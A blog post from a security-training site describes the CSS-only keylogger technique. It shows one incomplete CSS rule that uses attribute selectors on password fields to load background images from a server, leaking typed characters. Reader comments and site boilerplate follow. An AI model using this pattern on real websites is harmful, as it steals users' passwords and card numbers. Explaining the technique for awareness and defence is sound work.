CSS Hacking: The Surprise of February

March 4, 2018 | Views: 7110

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

To some it may have popped up earlier than 2018, for me it was quite new. I walked into the office after a week of teaching children how to code. Since the age group, the choice for HTML & CSS was more than acceptable. But to my surprise I may have got them way closer to writing their first sort of keylogger then I thought. A few of the kids who were accelerating the past 4 days had their first steps within Javascript and Angular. But even without Javascript knowledge, it is possible to log keys. The method is very creative.

I am going to show the method which I found on GitHub. Now there are a few things to keep in mind ahead.

  1. It’s not system-wide

  2. it is also really specific on what data you can obtain in this method.

  3. It is still dangerous, data like passwords and credit card numbers can be stolen.

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input’s with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

The css-code

input[type="password"][value$="a"] {
  background-image: url("https://localhost:3000/a");
Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. You can’t really do much about it, it is also just not worth the effort in most cases. But a browser can validate if the css doesn’t have odd code like this. Since it has to load in the css anyway it would be possible but it’s mostly up to the browser developers to validate the code. Again this is a very specific attack. However, there can be built upon this concept of course.

  2. so you will show them how to break items then how fix items?

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?